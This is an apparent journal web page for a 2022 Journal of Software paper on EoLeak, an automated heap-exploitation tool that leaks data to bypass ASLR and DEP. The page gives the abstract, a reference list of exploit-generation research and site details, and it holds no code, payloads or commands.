微信服务号

微信订阅号

2025-5-15- 23
Home > Archive>Volume 33, Issue 6, 2022 >2082-2096. DOI:10.13328/j.cnki.jos.006570
PDF HTML XML Export Cite reminder
Exploit-oriented Automated Information Leakage
Author:
Affiliation:

Clc Number:

TP311

  • Article
    • | |
  • Metrics
    • |
  • Reference [43]
    • |
  • Related [20]
    • | | |
  • Comments
    Abstract:

    Automated exploit generation (AEG) has become one of the most important ways to demonstrate the exploitability of vulnerabilities. However, state-of-the-art AEG solutions in general assume that the target system has no mitigations deployed, which is not true in modern operating systems since they often deploy mitigations like data execution prevention (DEP) and address space layout randomization (ASLR). This paper presents an automated solution EoLeak, able to exploit heap vulnerabilities to leak sensitive data and bypass ASLR and DEP at the same time. At a high level, EoLeak analyzes the program execution trace of the POC input that triggers the heap vulnerability, characterizes the memory profile from the trace and locates important data (e.g., code pointers), constructs leak primitives that discloses sensitive data, and generates exploits for the entire process when possible. A prototype of EoLeakis implemented and it is evaluated on a set of CTF binary programs and several real-world applications. Evaluation results show that EoLeak is effective in terms of leaking data and generating exploits.

    Reference
    [1] Liu J, Su PR, Yang M, He L, Zhang Y, Zhu XY, Lin HM. Software and cyber security-A survey. Ruan Jian Xue Bao/Journal of Software, 2018, 29(1):42-68(in Chinese with English abstract). http://www.jos.org.cn/1000-9825/5320.htm[doi:10.13328/j.cnki. jos.005320]
    [2] Zhao SR, Li XJ, Fang Y, Yu YP, Huang WH, Chen K, Su PR, Zhang YQ. A survey on automated exploit generation. Computer Research and Development, 2019, 56(10):2097-2111(in Chinese with English abstract).[doi:10.7544/issn1000-1239.2019. 20190655]
    [3] Heelan S. Automatic generation of control flow hijacking exploits for software vulnerabilities[MS. Thesis]. Oxford:University of Oxford, 2009.
    [4] Avgerinos T, Cha SK, Rebert A, Schwartz EJ, Woo M, Brumley D. Automatic exploit generation. Communications of the ACM, 2014, 57(2):74-84.[doi:10.1145/2560217.2560219]
    [5] Cha SK, Avgerinos T, Rebert A, Brumley D. Unleashing mayhem on binary code. In:Proc. of the 2012 IEEE Symp. on Security and Privacy. San Francisco:IEEE, 2012. 380-394.[doi:10.1109/SP.2012.31]
    [6] Schwartz EJ, Avgerinos T, Brumley D. Q:Exploit hardening made easy. In:Proc. of the 20th USENIX Security Symp. San Francisco:USENIX Association, 2011.
    [7] Huang SK, Huang MH, Huang PY, Lai CW, Lu HL, Leong WM. CRAX:Software crash analysis for automatic exploit generation by modeling attacks as symbolic continuations. In:Proc. of the 6th IEEE Int'l Conf. on Software Security and Reliability. Gaithersburg:IEEE, 2012. 78-87.[doi:10.1109/SERE.2012.20]
    [8] Caselden D, Bazhanyuk A, Payer M, Szekeres L, McCamant S, Song D. Transformation-aware exploit generation using a HI-CFG. University Berkeley, Department of Electrical Engineering and Computer Science, 2013.[doi:10.21236/ADA587051]
    [9] Heelan S, Melham T, Kroening D. Automatic heap layout manipulation for exploitation. In:Proc. of the 27th USENIX Security Symp. Baltimore:USENIX Association, 2018. 763-779.
    [10] Heelan S, Melham T, Kroening D. Gollum:Modular and greybox exploit generation for heap overflows in interpreters. In:Proc. of the 2019 ACM SIGSAC Conf. on Computer and Communications Security. London:ACM, 2019. 1689-1706.[doi:10.1145/3319535.3354224]
    [11] Wang Y, Zhang C, Zhao Z, Zhang B, Gong X, Zou W. MAZE:Towards automated heap feng shui. In:Proc. of the 30th USENIX Security Symp. Virtual:USENIX Association, 2021. 1647-1664.
    [12] Wang Y, Zhang C, Xiang X, Zhao Z, Li W, Gong X, Liu B, Chen K, Zou W. Revery:From proof-of-concept to exploitable. In:Proc. of the 2018 ACM SIGSAC Conf. on Computer and Communications Security. Toronto:ACM, 2018. 1914-1927.[doi:10. 1145/3243734.3243847]
    [13] Chen W, Zou X, Li G, Qian Z. KOOBE:Towards facilitating exploit generation of kernel out-of-bounds write vulnerabilities. In:Proc. of the 29th USENIX Security Symp. Virtual:USENIX Association, 2020. 1093-1110.
    [14] Wu W, Chen Y, Xu J, Xing X, Gong X, Zou W. FUZE:Towards facilitating exploit generation for kernel use-after-free vulnerabilities. In:Proc. of the 27th USENIX Security Symp. Baltimore:USENIX Association, 2018. 781-797.
    [15] Ning G, Zhang T, Wen W, Mei R. Study of non-heapspray IE's vulnerability exploitation technique. Netinfo Security, 2014(6):39-42(in Chinese with English abstract).[doi:10.3969/j.issn.1671-1122.2014.06.007]
    [16] van de Ven A. New Security Enhancements in Red Hat Enterprise Linux v.3, update 3. Raleigh:Red Hat, 2004.
    [17] Cowan C, Pu C, Maier D, Walpole J, Bakke P. StackGuard:Automatic adaptive detection and prevention of buffer-overflow attacks. In:Proc. of the 7th USENIX Security Symp. San Antonio:USENIX Association, 1998. 63-78.
    [18] PaX T. PaX address space layout randomization (ASLR). 2003. http://pax.grsecurity.net/docs/aslr.txt
    [19] Abadi M, Budiu M, Erlingsson U, Ligatti J. Control-flow integrity principles, implementations, and applications. ACM Trans. on Information and System Security, 2009, 13(1):1-40.[doi:10.1145/1609956.1609960]
    [20] Burow N, Carr SA, Nash J, Larsen P, Franz M, Brunthaler S, Payer M. Control-flow integrity:Precision, security, and performance. ACM Computing Serveys, 2017, 50(1):1-33.[doi:10.1145/3054924]
    [21] Tice C, Roeder T, Collingbourne P, Checkoway S, Erlingsson U, Lozano L, Pike G. Enforcing forward-edge control-flow integrity in GCC& LLVM. In:Proc. of the 23rd USENIX Security Symp. San Diego:USENIX Association, 2014. 941-955.
    [22] Brumley D, Poosankam P, Song D, Zheng J. Automatic patch-based exploit generation is possible:Techniques and implications. In:Proc. of the 2008 IEEE Symp. on Security and Privacy. Oakland:IEEE, 2008. 143-157.[doi:10.1109/SP.2008.17]
    [23] Wang M, Su P, Li Q, Ying L, Yang Y, Feng D. Automatic polymorphic exploit generation for software vulnerabilities. In:Zia T, ed. Proc. of the Security and Privacy in Communication Networks. Cham:Springer Int'l Publishing, 2013. 216-233.
    [24] Bao T, Wang R, Shoshitaishvili Y, Brumley D. Your exploit is mine:Automatic shellcode transplant for remote exploits. In:Proc. of the 2017 IEEE Symp. on Security and Privacy. San Jose:IEEE, 2017. 824-839.[doi:10.1109/SP.2017.67]
    [25] Wu W, Chen Y, Xing X, Zou W. KEPLER:Facilitating control-flow hijacking primitive evaluation for Linux kernel vulnerabilities. In:Proc. of the 28th USENIX Security Symp. Santa Clara:USENIX Association, 2019. 1187-1204.
    [26] Fang H, Wu L, Wu Z. Automatic return-to-dl-resolve exploit generation method based on symbolic execution. Computer Science, 2019, 46(2):127-132(in Chinese with English abstract).[doi:10.11896/j.issn.1002-137X.2019.02.020]
    [27] Dolan-Gavitt B, Hodosh J, Hulin P, Leek T, Whelan R. Repeatable reverse engineering with PANDA. In:Proc. of the 5th Program Protection and Reverse Engineering Workshop. Los Angeles:ACM, 2015.[doi:10.1145/2843859.2843867]
    [28] Chen K, Zhang C, Yin T, Chen X, Zhao L. VScape:Assessing and escaping virtual call protections. In:Proc. of the 30th USENIX Security Symp. Virtual:USENIX Association, 2021. 1719-1736.
    [29] Brumley D, Jager I, Avgerinos T, Schwartz EJ. BAP:A binary analysis platform. In:Gopalakrishnan G, ed. Proc. of the Computer Aided Verification. Berlin:Springer, 2011. 463-469.[doi:10.1007/978-3-642-22110-1_37]
    [30] Hu H, Chua ZL, Adrian S, Saxena P, Liang Z. Automatic generation of data-oriented exploits. In:Proc. of the 24th USENIX Security Symp. Washington:USENIX Association, 2015. 177-192.
    [31] Hu H, Shinde S, Adrian S, Chua ZL, Saxena P, Liang Z. Data-oriented programming:On the expressiveness of non-control data attacks. In:Proc. of the 2016 IEEE Symp. on Security and Privacy. San Jose:IEEE, 2016. 969-986.[doi:10.1109/SP.2016.62]
    [32] Ispoglou KK, AlBassam B, Jaeger T, Payer M. Block oriented programming:Automating data-only attacks. In:Proc. of the 2018 ACM SIGSAC Conf. on Computer and Communications Security. Toronto:ACM, 2018. 1868-1882.
    [33] Clause J, Li W, Orso A. Dytan:A generic dynamic taint analysis framework. In:Proc. of the 2007 Int'l Symp. on Software Testing and Analysis. London:ACM, 2007. 196-206.[doi:10.1145/1273463.1273490]
    [34] Kemerlis VP, Portokalidis G, Jee K, Keromytis AD. libdft:Practical dynamic data flow tracking for commodity systems. In:Proc. of the 8th ACM SIGPLAN/SIGOPS Conf. on Virtual Execution Environments. New York:ACM, 2012. 121-132.
    [35] Schwartz EJ, Avgerinos T, Brumley D. All you ever wanted to know about dynamic taint analysis and forward symbolic execution (bug might have been afraid to ask). In:Proc. of the 2010 IEEE Symp. on Security and Privacy. Oakland:IEEE, 2010. 317-331.[doi:10.1109/SP.2010.26]
    [36] Chua ZL, Wang Y, Baluta T, Saxena P, Liang Z, Su P. One engine to serve'em all:Inferring taint rules without architectural semantics. In:Proc. of the Network and Distributed System Security Symp. San Diego:Internet Society, 2019.[doi:10.14722/ndss. 2019.23339]
    [37] Song D, Brumley D, Yin H, Caballero J, Jager I, Kang MG, Liang Z, Newsome J, Poosankam P, Saxena P. BitBlaze:A new approach to computer security via binary analysis. In:Sekar R, ed. Proc. of the Information Systems Security. Berlin:Springer, 2008. 1-25.[doi:10.1007/978-3-540-89862-7_1]
    [38] Saudel F, Salwan J. Triton:Concolic execution framework. In:Proc. of the Rennes:Symp. sur la Sécurité des Technologies de l'Information et des Communications, 2015.
    [39] She D, Chen Y, Shah A, Ray B, Jana S. Neutaint:Efficient dynamic taint analysis with neural networks. In:Proc. of the 2020 IEEE Symp. on Security and Privacy. San Francisco:IEEE, 2020. 1527-1543.[doi:10.1109/SP40000.2020.00022]
    附中文参考文献:
    [1] 刘剑,苏璞睿,杨珉,和亮,张源,朱雪阳,林惠民.软件与网络安全研究综述.软件学报, 2018, 29(1):42-68. http://www.jos. org.cn/1000-9825/5320.htm[doi:10.13328/j.cnki.jos.005320]
    [2] 赵尚儒,李学俊,方越,余媛萍,黄伟豪,陈恺,苏璞睿,张玉清.安全漏洞自动利用综述.计算机研究与发展, 2019, 56(10):2097-2111.[doi:10.7544/issn1000-1239.2019.20190655]
    [15] 宁戈,张涛,文伟平,梅瑞.一种非堆喷射的IE浏览器漏洞利用技术研究.信息网络安全, 2014(6):39-42.[doi:10.3969/j.issn. 1671-1122.2014.06.007]
    [26] 方皓,吴礼发,吴志勇.基于符号执行的Return-to-dl-resolve利用代码自动生成方法.计算机科学, 2019, 46(2):127-132.[doi:10.11896/j.issn.1002-137X.2019.02.020]
    Cited by
    Comments
    Comments
    分享到微博
    Submit
Get Citation

杨松涛,陈凯翔,王准,张超.面向缓解机制评估的自动化信息泄露方法.软件学报,2022,33(6):2082-2096

Copy
Share
Article Metrics
  • Abstract:
  • PDF:
  • HTML:
  • Cited by:
History
  • Received:September 05,2021
  • Revised:October 15,2021
  • Online: January 28,2022
  • Published: June 06,2022
Links:Institute of Software, CASChina Computer FederationCASNSFC
You are the first2044751Visitors
Copyright: Institute of Software, Chinese Academy of Sciences Beijing ICP No. 05046678-4
Address:4# South Fourth Street, Zhong Guan Cun, Beijing 100190,Postal Code:100190
Phone:010-62562563 Fax:010-62562533 Email:jos@iscas.ac.cn
Technical Support:Beijing Qinyun Technology Development Co., Ltd.

Beijing Public Network Security No. 11040202500063